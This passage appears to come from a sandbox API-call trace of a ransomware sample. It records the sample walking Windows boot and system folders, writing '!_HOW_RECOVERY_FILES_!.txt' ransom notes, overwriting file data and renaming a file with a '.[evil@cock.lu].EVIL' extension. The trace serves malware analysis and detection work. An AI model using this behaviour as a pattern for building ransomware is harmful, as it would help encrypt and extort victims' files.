_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.799] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0079.800] wcslen (_String="C:\\\\Boot\\zh-CN\\memtest.exe.mui") returned 0x1e [0079.800] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.800] GetLastError () returned 0x5 [0079.800] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.800] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.800] wcslen (_String="C:\\\\Boot\\zh-CN") returned 0xe [0079.800] strlen (_Str="${KEY}") returned 0x6 [0079.800] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.800] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.800] strlen (_Str="${CODE}") returned 0x7 [0079.800] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.800] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.800] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.800] _wfsopen (_FileName="C:\\\\Boot\\zh-CN\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.820] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.820] __uncaught_exception () returned 0x84b1160800 [0079.820] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.821] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.821] wcsstr (_Str="zh-HK", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.821] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-HK") returned 14 [0079.821] wcscmp (_String1=".", _String2="zh-HK") returned -1 [0079.821] wcscmp (_String1="..", _String2="zh-HK") returned -1 [0079.821] wcslen (_String="C:\\\\Boot\\zh-HK") returned 0xe [0079.821] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\zh-HK" | out: _Destination="C:\\\\Boot\\zh-HK") returned 0x0 [0079.821] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\zh-HK\\*") returned="C:\\\\Boot\\zh-HK\\*" [0079.821] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-HK\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.821] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.821] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-HK\\.") returned 16 [0079.821] wcscmp (_String1=".", _String2=".") returned 0 [0079.821] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.821] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.821] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-HK\\..") returned 17 [0079.821] wcscmp (_String1=".", _String2="..") returned -1 [0079.821] wcscmp (_String1="..", _String2="..") returned 0 [0079.821] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.821] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.821] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui") returned 30 [0079.821] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.821] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.821] wcslen (_String="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui") returned 0x1e [0079.821] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.821] GetLastError () returned 0x5 [0079.821] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.821] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.821] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-HK\\memtest.exe.mui") returned 30 [0079.821] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.822] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0079.822] wcslen (_String="C:\\\\Boot\\zh-HK\\memtest.exe.mui") returned 0x1e [0079.822] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.869] GetLastError () returned 0x5 [0079.869] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.869] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.869] wcslen (_String="C:\\\\Boot\\zh-HK") returned 0xe [0079.869] strlen (_Str="${KEY}") returned 0x6 [0079.869] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.869] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.869] strlen (_Str="${CODE}") returned 0x7 [0079.869] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.870] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.870] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.870] _wfsopen (_FileName="C:\\\\Boot\\zh-HK\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.938] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.938] __uncaught_exception () returned 0x84b1160800 [0079.938] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.939] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0079.939] wcsstr (_Str="zh-TW", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.939] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-TW") returned 14 [0079.939] wcscmp (_String1=".", _String2="zh-TW") returned -1 [0079.939] wcscmp (_String1="..", _String2="zh-TW") returned -1 [0079.939] wcslen (_String="C:\\\\Boot\\zh-TW") returned 0xe [0079.939] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\zh-TW" | out: _Destination="C:\\\\Boot\\zh-TW") returned 0x0 [0079.939] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\zh-TW\\*") returned="C:\\\\Boot\\zh-TW\\*" [0079.939] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-TW\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0079.940] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.940] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-TW\\.") returned 16 [0079.940] wcscmp (_String1=".", _String2=".") returned 0 [0079.940] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.940] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.940] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-TW\\..") returned 17 [0079.940] wcscmp (_String1=".", _String2="..") returned -1 [0079.940] wcscmp (_String1="..", _String2="..") returned 0 [0079.940] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.940] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.940] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui") returned 30 [0079.940] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0079.940] wcslen (_String="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui") returned 0x1e [0079.940] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.940] GetLastError () returned 0x5 [0079.940] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0079.940] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.940] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\zh-TW\\memtest.exe.mui") returned 30 [0079.940] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0079.940] wcslen (_String="C:\\\\Boot\\zh-TW\\memtest.exe.mui") returned 0x1e [0079.940] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0079.940] GetLastError () returned 0x5 [0079.941] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0079.941] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0079.941] wcslen (_String="C:\\\\Boot\\zh-TW") returned 0xe [0079.941] strlen (_Str="${KEY}") returned 0x6 [0079.941] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.941] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.941] strlen (_Str="${CODE}") returned 0x7 [0079.941] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.941] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.941] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.941] _wfsopen (_FileName="C:\\\\Boot\\zh-TW\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.982] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.982] __uncaught_exception () returned 0x84b1160800 [0079.983] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.983] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 0 [0079.983] FindClose (in: hFindFile=0x84b11cd0f0 | out: hFindFile=0x84b11cd0f0) returned 1 [0079.983] wcslen (_String="C:\\\\Boot") returned 0x8 [0079.983] strlen (_Str="${KEY}") returned 0x6 [0079.983] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0079.983] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0079.983] strlen (_Str="${CODE}") returned 0x7 [0079.983] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0079.984] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.984] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0079.984] _wfsopen (_FileName="C:\\\\Boot\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0079.984] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0079.984] __uncaught_exception () returned 0x84b1160800 [0079.984] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0079.985] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0079.985] wcsstr (_Str="bootmgr", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0079.985] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\bootmgr") returned 11 [0079.985] wcscmp (_String1="bootmgr", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0079.985] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr") returned 0x0 [0079.985] wcslen (_String="C:\\\\bootmgr") returned 0xb [0079.985] CreateFileW (lpFileName="C:\\\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0080.100] GetLastError () returned 0x5 [0080.100] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0080.101] wcsstr (_Str="BOOTNXT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.101] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\BOOTNXT") returned 11 [0080.101] wcscmp (_String1="BOOTNXT", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.101] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BOOTNXT") returned 0x0 [0080.101] wcslen (_String="C:\\\\BOOTNXT") returned 0xb [0080.101] CreateFileW (lpFileName="C:\\\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0080.103] ReadFile (in: hFile=0x190, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdf140, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdf140*=0x1, lpOverlapped=0x0) returned 1 [0080.112] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.112] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.112] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.112] _errno () returned 0x84b1160840 [0080.112] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.112] WriteFile (in: hFile=0x190, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x84b0fdf140, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdf140*=0x20, lpOverlapped=0x0) returned 1 [0080.112] CloseHandle (hObject=0x190) returned 1 [0080.113] _wfsopen (_FileName="C:\\\\BOOTNXT", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.113] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.113] __uncaught_exception () returned 0x84b1160800 [0080.113] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.114] MoveFileW (lpExistingFileName="C:\\\\BOOTNXT" (normalized: "c:\\bootnxt"), lpNewFileName="C:\\\\BOOTNXT.[evil@cock.lu].EVIL" (normalized: "c:\\bootnxt.[evil@cock.lu].evil")) returned 1 [0080.115] ??_V@YAXPEAX@Z () returned 0x1 [0080.118] SetFileAttributesW (lpFileName="C:\\\\BOOTNXT", dwFileAttributes=0x0) returned 0 [0080.118] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0080.118] wcsstr (_Str="BOOTSECT.BAK", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.118] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\BOOTSECT.BAK") returned 16 [0080.118] wcscmp (_String1="BOOTSECT.BAK", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.118] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BOOTSECT.BAK") returned 0x0 [0080.118] wcslen (_String="C:\\\\BOOTSECT.BAK") returned 0x10 [0080.118] CreateFileW (lpFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0080.151] GetLastError () returned 0x5 [0080.151] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0080.151] wcsstr (_Str="Documents and Settings", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.151] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Documents and Settings") returned 26 [0080.151] wcscmp (_String1=".", _String2="Documents and Settings") returned -1 [0080.151] wcscmp (_String1="..", _String2="Documents and Settings") returned -1 [0080.151] wcslen (_String="C:\\\\Documents and Settings") returned 0x1a [0080.151] wcscpy_s (in: _Destination=0x84b0fdf0d0, _SizeInWords=0x104, _Source="C:\\\\Documents and Settings" | out: _Destination="C:\\\\Documents and Settings") returned 0x0 [0080.151] wcscat (in: _Dest=0x84b0fdf0d0, _Source="\\*" | out: _Dest="C:\\\\Documents and Settings\\*") returned="C:\\\\Documents and Settings\\*" [0080.152] FindFirstFileW (in: lpFileName="C:\\\\Documents and Settings\\*", lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 0xffffffffffffffff [0080.152] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0080.152] wcsstr (_Str="hiberfil.sys", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.152] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\hiberfil.sys") returned 16 [0080.152] wcscmp (_String1="hiberfil.sys", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.152] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hiberfil.sys") returned 0x0 [0080.152] wcslen (_String="C:\\\\hiberfil.sys") returned 0x10 [0080.152] CreateFileW (lpFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0080.152] GetLastError () returned 0x20 [0080.153] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0080.153] wcsstr (_Str="pagefile.sys", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.153] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\pagefile.sys") returned 16 [0080.153] wcscmp (_String1="pagefile.sys", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.153] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="pagefile.sys") returned 0x0 [0080.153] wcslen (_String="C:\\\\pagefile.sys") returned 0x10 [0080.153] CreateFileW (lpFileName="C:\\\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0080.153] GetLastError () returned 0x20 [0080.153] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0080.153] wcsstr (_Str="PerfLogs", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.153] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\PerfLogs") returned 12 [0080.153] wcscmp (_String1=".", _String2="PerfLogs") returned -1 [0080.153] wcscmp (_String1="..", _String2="PerfLogs") returned -1 [0080.153] wcslen (_String="C:\\\\PerfLogs") returned 0xc [0080.153] wcscpy_s (in: _Destination=0x84b0fdf0d0, _SizeInWords=0x104, _Source="C:\\\\PerfLogs" | out: _Destination="C:\\\\PerfLogs") returned 0x0 [0080.153] wcscat (in: _Dest=0x84b0fdf0d0, _Source="\\*" | out: _Dest="C:\\\\PerfLogs\\*") returned="C:\\\\PerfLogs\\*" [0080.153] FindFirstFileW (in: lpFileName="C:\\\\PerfLogs\\*", lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 0x84b11cd0f0 [0080.154] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.154] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\PerfLogs\\.") returned 14 [0080.154] wcscmp (_String1=".", _String2=".") returned 0 [0080.154] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0080.154] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.154] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\PerfLogs\\..") returned 15 [0080.154] wcscmp (_String1=".", _String2="..") returned -1 [0080.154] wcscmp (_String1="..", _String2="..") returned 0 [0080.154] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 0 [0080.154] FindClose (in: hFindFile=0x84b11cd0f0 | out: hFindFile=0x84b11cd0f0) returned 1 [0080.154] wcslen (_String="C:\\\\PerfLogs") returned 0xc [0080.154] strlen (_Str="${KEY}") returned 0x6 [0080.154] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0080.154] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0080.154] strlen (_Str="${CODE}") returned 0x7 [0080.154] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0080.154] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0080.154] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0080.154] _wfsopen (_FileName="C:\\\\PerfLogs\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.155] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0080.155] __uncaught_exception () returned 0x84b1160800 [0080.155] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.156] FindNextFileW (in: hFindFile=0x84b11cd630, lpFindFileData=0x84b0fdf3a0 | out: lpFindFileData=0x84b0fdf3a0) returned 1 [0080.156] wcsstr (_Str="Program Files", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.156] _snwprintf (in: _Dest=0x84b0fdf5f0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files") returned 17 [0080.156] wcscmp (_String1=".", _String2="Program Files") returned -1 [0080.156] wcscmp (_String1="..", _String2="Program Files") returned -1 [0080.156] wcslen (_String="C:\\\\Program Files") returned 0x11 [0080.156] wcscpy_s (in: _Destination=0x84b0fdf0d0, _SizeInWords=0x104, _Source="C:\\\\Program Files" | out: _Destination="C:\\\\Program Files") returned 0x0 [0080.156] wcscat (in: _Dest=0x84b0fdf0d0, _Source="\\*" | out: _Dest="C:\\\\Program Files\\*") returned="C:\\\\Program Files\\*" [0080.156] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\*", lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 0x84b11cd0f0 [0080.156] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.156] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\.") returned 19 [0080.156] wcscmp (_String1=".", _String2=".") returned 0 [0080.156] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0080.156] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.156] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\..") returned 20 [0080.157] wcscmp (_String1=".", _String2="..") returned -1 [0080.157] wcscmp (_String1="..", _String2="..") returned 0 [0080.157] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0080.157] wcsstr (_Str="Common Files", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.157] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files") returned 30 [0080.157] wcscmp 